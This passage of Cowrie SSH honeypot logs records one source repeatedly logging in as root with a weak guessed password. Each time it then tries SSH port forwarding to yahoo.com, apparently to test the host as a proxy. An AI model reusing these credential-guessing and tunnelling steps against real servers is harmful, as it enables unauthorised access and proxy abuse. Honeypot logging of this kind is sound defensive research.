{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.141180Z","src_ip":"213.209.150.239","session":"4692cad31592"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20245,"dst_ip":"1.2.3.4","dst_port":22,"session":"4380fd90a1fc","protocol":"ssh","message":"New connection: 213.209.150.239:20245 (1.2.3.4:22) [session: 4380fd90a1fc]","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.187527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.197279Z","src_ip":"213.209.150.239","session":"4380fd90a1fc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.235415Z","src_ip":"213.209.150.239","session":"4380fd90a1fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.470644Z","src_ip":"213.209.150.239","session":"4380fd90a1fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20642,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20642","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.518749Z","session":"4380fd90a1fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.565998Z","src_ip":"213.209.150.239","session":"4380fd90a1fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":6123,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6123","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.701531Z","session":"4380fd90a1fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.748871Z","src_ip":"213.209.150.239","session":"4380fd90a1fc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.797105Z","src_ip":"213.209.150.239","session":"4380fd90a1fc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20300,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae462e0dae2","protocol":"ssh","message":"New connection: 213.209.150.239:20300 (1.2.3.4:22) [session: 9ae462e0dae2]","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.852744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.853707Z","src_ip":"213.209.150.239","session":"9ae462e0dae2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.910213Z","src_ip":"213.209.150.239","session":"9ae462e0dae2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.193391Z","src_ip":"213.209.150.239","session":"9ae462e0dae2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21569,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21569","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.250802Z","session":"9ae462e0dae2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.307651Z","src_ip":"213.209.150.239","session":"9ae462e0dae2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":6289,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6289","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.462960Z","session":"9ae462e0dae2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.519670Z","src_ip":"213.209.150.239","session":"9ae462e0dae2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.577094Z","src_ip":"213.209.150.239","session":"9ae462e0dae2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20359,"dst_ip":"1.2.3.4","dst_port":22,"session":"eae4e57ef5ab","protocol":"ssh","message":"New connection: 213.209.150.239:20359 (1.2.3.4:22) [session: eae4e57ef5ab]","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.632926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.633801Z","src_ip":"213.209.150.239","session":"eae4e57ef5ab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.690408Z","src_ip":"213.209.150.239","session":"eae4e57ef5ab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:51.973346Z","src_ip":"213.209.150.239","session":"eae4e57ef5ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":1883,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1883","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.032421Z","session":"eae4e57ef5ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.089146Z","src_ip":"213.209.150.239","session":"eae4e57ef5ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12553,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12553","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.243263Z","session":"eae4e57ef5ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.300126Z","src_ip":"213.209.150.239","session":"eae4e57ef5ab"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.357609Z","src_ip":"213.209.150.239","session":"eae4e57ef5ab"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20406,"dst_ip":"1.2.3.4","dst_port":22,"session":"b07073807051","protocol":"ssh","message":"New connection: 213.209.150.239:20406 (1.2.3.4:22) [session: b07073807051]","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.413400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.414333Z","src_ip":"213.209.150.239","session":"b07073807051"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.470906Z","src_ip":"213.209.150.239","session":"b07073807051"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.753855Z","src_ip":"213.209.150.239","session":"b07073807051"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29114,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29114","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.811643Z","session":"b07073807051"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:52.868470Z","src_ip":"213.209.150.239","session":"b07073807051"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":12960,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12960","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.023257Z","session":"b07073807051"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.080062Z","src_ip":"213.209.150.239","session":"b07073807051"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.137657Z","src_ip":"213.209.150.239","session":"b07073807051"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20457,"dst_ip":"1.2.3.4","dst_port":22,"session":"8564a8892b37","protocol":"ssh","message":"New connection: 213.209.150.239:20457 (1.2.3.4:22) [session: 8564a8892b37]","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.193077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.194162Z","src_ip":"213.209.150.239","session":"8564a8892b37"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.250696Z","src_ip":"213.209.150.239","session":"8564a8892b37"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.532230Z","src_ip":"213.209.150.239","session":"8564a8892b37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":21288,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21288","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.589609Z","session":"8564a8892b37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.646120Z","src_ip":"213.209.150.239","session":"8564a8892b37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24704,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24704","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.798930Z","session":"8564a8892b37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.855497Z","src_ip":"213.209.150.239","session":"8564a8892b37"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.913393Z","src_ip":"213.209.150.239","session":"8564a8892b37"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20510,"dst_ip":"1.2.3.4","dst_port":22,"session":"720a6d701012","protocol":"ssh","message":"New connection: 213.209.150.239:20510 (1.2.3.4:22) [session: 720a6d701012]","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.968941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:53.969696Z","src_ip":"213.209.150.239","session":"720a6d701012"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-r